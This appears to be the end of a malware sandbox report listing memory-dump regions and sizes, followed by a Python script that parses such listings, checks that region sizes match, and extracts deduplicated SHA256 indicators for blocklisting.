  Filesize  10.8MB

• memory/2452-11-0x00007FFC091C0000-0x00007FFC09C81000-memory.dmp
  Filesize  10.8MB

• memory/5032-47-0x000001D59A670000-0x000001D59A680000-memory.dmp
  Filesize  64KB

• memory/5032-50-0x000001D59A690000-0x000001D59A6B6000-memory.dmp
  Filesize  152KB

• memory/5032-51-0x000001D59A6C0000-0x000001D59A6D2000-memory.dmp
  Filesize  72KB

• memory/5032-48-0x000001D5FF8B0000-0x000001D5FF8CA000-memory.dmp
  Filesize  104KB

• memory/5032-52-0x000001D59A6D0000-0x000001D59A6D8000-memory.dmp
  Filesize  32KB

• memory/5032-53-0x000001D5FF440000-0x000001D5FF448000-memory.dmp
  Filesize  32KB

• memory/5032-49-0x000001D59A680000-0x000001D59A68A000-memory.dmp
  Filesize  40KB

• memory/5032-46-0x000001D59A140000-0x000001D59A336000-memory.dmp
  Filesize  2.0MB

• memory/5032-41-0x000001D5999D0000-0x000001D599B60000-memory.dmp
  Filesize  1.6MB

• memory/5032-39-0x000001D6007B0000-0x000001D600F56000-memory.dmp
  Filesize  7.6MB

• memory/5696-724-0x0000000140000000-0x0000000141668000-memory.dmp
  Filesize  22.4MB

• memory/5696-723-0x00007FFC29060000-0x00007FFC29062000-memory.dmp
  Filesize  8KB

• memory/5696-722-0x00007FFC29050000-0x00007FFC29052000-memory.dmp
  Filesize  8KB
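The dropped-file and memory-dump listing above is usually consumed by copying hashes out by hand. As an added example (not part of this report and not the sandbox vendor's tooling), the Python script below parses entries in that flattened label/value layout into records, decodes the `memory/<pid>-<index>-<start>-<end>` names into a PID and address range, checks that each region's stated Filesize matches `end - start` in the report's own base-1024 notation, counts how many distinct hashes each path was seen with (a path listed several times with different hashes was rewritten during the run), and emits a deduplicated SHA256 list. The embedded sample is a constructed excerpt of entries copied from this page; everything else (function names, the size-formatting rule) is an assumption of this example.

```python
import re
from collections import defaultdict

# Constructed excerpt: entries copied from the listing above, in its flattened label/value form.
SAMPLE = r"""
• C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
Filesize
10KB
MD5
2559ada419dce229bf313f77e2c53082
SHA1
28f47f37adcf1b9b151a072c2e5b18376b81f8d6
SHA256
54da1222dc1f0b7efe7fd1808e0d9643a2433156b4f5427ea83b8c61116898f5
SHA512
457f43676e93355c8fbf564f774fe12eab791b6da742c2e8c0f1710eebde364d46ab4c0594eac8c04434c9a28ba4837b76287c6f2d8b051f0075ff3dbbd514ce
• C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
Filesize
10KB
MD5
707354254ea0094be0926359d5c3e05e
SHA1
649a14b91e057a20a2b4b06ddd2474f12928b7eb
SHA256
ff2cda5b79cf1fd953b9d6a0ed6a887ebc2c00a3ccd0ea193a8fea4b51c76aba
SHA512
f9a4cffd06ab228412fa530d386d494894d2b54e245ed3410ccd628379eee2badfb3a120565521ac3f7a210dead41949d7307e09ed99ffc518b9cfbafcd120f1
• C:\Users\Admin\Downloads\OceanMinecraft.exe.crdownload
Filesize
7.7MB
MD5
5a3d03a33500b65c35f569cd13172e53
SHA1
ceeea6aeaf06478a5a1466bd92b1767a4bc3826b
SHA256
64f0b8d07151832fb135fef20526f71d0f37692c6be8b5814052382e234acca1
SHA512
22ba3308d0a411251edc613ded45dcaf2724179244ac815cb3b20329cbe264e216dc3afe9748935ff298ec81836b2f2d777eced60f57a8d5b30151354d349790
• memory/5696-724-0x0000000140000000-0x0000000141668000-memory.dmp
Filesize
22.4MB
"""

HASH_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}
MEM_RE = re.compile(r"^memory/(\d+)-(\d+)-0x([0-9A-Fa-f]+)-0x([0-9A-Fa-f]+)-memory\.dmp$")


def parse_listing(text):
    """Walk the flattened listing: a bullet opens an entry, label/value pairs follow.
    Returns (dropped_files, memory_regions); region names are decoded into pid/index/start/end."""
    files, regions, cur = [], [], None
    toks = [t.strip() for t in text.splitlines() if t.strip()]
    i = 0
    while i < len(toks):
        if toks[i].startswith("•"):
            cur = {"name": toks[i][1:].strip()}
            m = MEM_RE.match(cur["name"])
            if m:
                cur.update(pid=int(m[1]), index=int(m[2]), start=int(m[3], 16), end=int(m[4], 16))
            (regions if m else files).append(cur)
            i += 1
        elif cur is not None and i + 1 < len(toks) and (toks[i] == "Filesize" or toks[i] in HASH_LEN):
            cur[toks[i]] = toks[i + 1]
            i += 2
        else:
            raise ValueError(f"unexpected token {toks[i]!r}")
    return files, regions


def format_size(n):
    """Reproduce the report's size notation (assumed): bytes, whole KB, or MB to one decimal, base 1024."""
    if n < 1024:
        return f"{n}B"
    if n < 1024 ** 2:
        return f"{n // 1024}KB"
    return f"{n / 1024 ** 2:.1f}MB"


def region_size_mismatches(regions):
    """Names of regions whose stated Filesize disagrees with end - start: a sanity check on the listing."""
    return [r["name"] for r in regions if format_size(r["end"] - r["start"]) != r["Filesize"]]


def hash_ok(entry):
    """True when every hash field is lowercase hex of the expected length (catches truncated copies)."""
    return all(re.fullmatch(r"[0-9a-f]{%d}" % n, entry.get(k, "")) for k, n in HASH_LEN.items())


def versions_per_path(files):
    """Distinct SHA256 values per path; more than one means the file was rewritten during the run."""
    seen = defaultdict(set)
    for f in files:
        seen[f["name"]].add(f["SHA256"])
    return {path: len(hashes) for path, hashes in seen.items()}


def sha256_iocs(files):
    """Deduplicated, sorted SHA256 list for a blocklist or retro-hunt, skipping malformed entries."""
    return sorted({f["SHA256"] for f in files if hash_ok(f)})


if __name__ == "__main__":
    files, regions = parse_listing(SAMPLE)
    print(versions_per_path(files))
    print(region_size_mismatches(regions))
    print(sha256_iocs(files))
```

Run against the full listing, the size check confirms the dump names encode the region bounds (for instance 0x141668000 - 0x140000000 = 0x1668000 bytes, which the report prints as 22.4MB), and the per-path count separates browser profile files that were rewritten repeatedly from one-off drops such as the .crdownload.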